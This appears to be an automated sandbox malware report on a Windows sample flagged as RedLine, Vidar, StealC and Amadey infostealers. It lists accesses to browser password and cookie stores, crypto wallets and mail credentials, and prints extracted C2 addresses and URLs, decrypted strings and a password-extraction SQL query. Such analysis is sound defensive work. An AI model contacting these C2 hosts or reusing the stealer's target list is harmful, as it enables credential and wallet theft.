Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Directory queried: C:\Users\user\Documents

Yara detected Credential Stealer

Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.0.buildred.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0C40 sqlite3_bind_zeroblob,	0_2_6C8C0C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0D60 sqlite3_bind_parameter_name,	0_2_6C8C0D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E8EA0 sqlite3_clear_bindings,	0_2_6C7E8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C8C0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E6410 bind,WSAGetLastError,	0_2_6C7E6410

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.153.155.231	ssl.bingadsedgeextension-prod-centralus.azurewebsites.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.251.35.161	unknown	United States	15169	GOOGLEUS	false
142.250.65.163	unknown	United States	15169	GOOGLEUS	false
85.28.47.31	unknown	Russian Federation	31643	GES-ASRU	true
142.251.40.227	unknown	United States	15169	GOOGLEUS	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
172.217.23.110	unknown	United States	15169	GOOGLEUS	false
142.251.168.84	unknown	United States	15169	GOOGLEUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
142.250.185.67	unknown	United States	15169	GOOGLEUS	false
185.215.113.9	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.185.110	unknown	United States	15169	GOOGLEUS	false
64.233.167.84	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
20.75.60.91	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
104.21.72.79	vaniloin.fun	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
chrome.cloudflare-dns.com	172.64.41.3	true
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true
vaniloin.fun	104.21.72.79	true
ssl.bingadsedgeextension-prod-centralus.azurewebsites.net	52.153.155.231	true
googlehosted.l.googleusercontent.com	142.250.185.161	true
clients2.googleusercontent.com	unknown	unknown
bzib.nelreports.net	unknown	unknown
www.youtube-nocookie.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: malware	unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.31/8405906461a5200c/nss3.dll	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll;	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllk	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.phposition:	Avira URL Cloud: Label: malware

Found malware configuration

Source: 26.0.buildred.exe.800000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.9:9137"], "Bot Id": "Logs", "Authorization Header": "f3f88d8c3034a76ac8ad2a0de6407050"}
Source: 0.2.file.exe.2600e67.1.raw.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: explorti.exe.3652.19.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: ba77748b9b.exe.3144.22.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\1000003002\ead6a72944.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 22
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 08
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 20
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 24
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sleep
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sscanf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: http://85.28.47.31
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: silence
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sila
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32First
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindClose
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PATH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: browser:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: profile:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: url:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: login:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: password:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Network
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: .txt
